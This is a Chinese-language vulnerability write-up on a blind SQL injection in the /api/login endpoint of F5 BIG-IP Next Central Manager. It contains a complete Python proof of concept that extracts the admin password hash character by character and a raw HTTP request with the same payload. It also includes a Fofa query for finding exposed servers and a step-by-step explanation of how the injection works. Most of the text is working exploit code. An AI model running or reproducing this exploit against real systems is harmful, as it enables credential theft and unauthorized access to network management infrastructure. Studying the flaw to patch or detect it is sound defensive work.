F5 BIG-IP Next Central Manager SQL注入漏洞

漏洞描述：

该漏洞允许未经授权的攻击者通过网络远程执行恶意SQL语句，该漏洞具体存在于对API接收的参数进行处理时，没有正确的验证和过滤用户输入。

Fofa: title="BIG-IP Next | Central Manager"

POC:

import string
 
import requests
import urllib3
import argparse
 
urllib3.disable_warnings()
 
def encode_string(s: str) -> str:
    return ",".join([f"chr({ord(c)})" for c in s])
 
def leak_hash(target: str, target_user: str = "admin"):
    charset = string.digits + string.ascii_letters + '/.$'
    encoded_user = encode_string(target_user)
 
    URL = f"{target}/api/login"
    current_guess = ''
    while True:
        guessed = False
        for guess in charset:
            full_guess = encode_string(current_guess + guess + '%')
            stuff = requests.post(URL, json={
                "username": "fake_user",
                "password": "password",
                "provider_type": "LDAP",
                "provider_name": f"LDAPP'or' name = (select case when (password like concat({full_guess})) then chr(76)||chr(111)||chr(99)||chr(97)||chr(108) else chr(76) end from mbiq_system.users where username like concat({encoded_user}) limit 1)"
            }, verify=False).json()
            if "root distinguished name is required" in stuff["message"]:
                guessed = True
                current_guess += guess
                print("[+]", current_guess)
                break
        if not guessed:
            break
 
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Leak the admin password hash')
    parser.add_argument('target', type=str, help='The target URL')
    parser.add_argument('target_user', type=str, help='The target user', default='admin', nargs='?')
    args = parser.parse_args()
    leak_hash(args.target, args.target_user)

根据网上公开的POC构造burp数据包，在/api/login接口处存在注入点

POST /api/login HTTP/1.1
Host: example.com
Content-Type: application/json
Content-Length: 123

{
    "username": "fake_user",
    "password": "password",
    "provider_type": "LDAP",
    "provider_name": "LDAPP'or' name = (select case when (password like concat({full_guess})) then chr(76)||chr(111)||chr(99)||chr(97)||chr(108) else chr(76) end from mbiq_system.users where username like concat({encoded_user}) limit 1)"
}

主要payload为 "provider_name": "LDAPP'or' name = (select case when (password like concat({full_guess})) then chr(76)||chr(111)||chr(99)||chr(97)||chr(108) else chr(76) end from mbiq_system.users where username like concat({encoded_user}) limit 1)"

通过LDAPP'or'闭合原始查询，在通过OR来改变查询的逻辑，使得后续SQL条件成立时，整个SQL语句始终为真
通过Select case when (password like concat({full_guess}))来判断用户的密码是否与攻击者猜测的密码匹配
如果密码与猜测的部分一致，就会返回一个字符串Local，利用chr()将ASCII码转换成字符，可以避免直接在查询中使用敏感词
如果密码不一致，就只返回字符L
from mbiq_system.users where username like concat({encoded_user}) limit 1指定了要从哪个表中检索数据，并且使用WHERE条件限制了用户名必须与提供的编码用户名匹配

以上Payload应该是漏洞发布者一步一步测试的最后的Payload，当碰到这中漏洞点时，还是需要自己一步一步的修改语句

漏洞复现

在fofa中搜索资产，共有17条匹配数据

17个资源全部访问失败，应该都关站整改了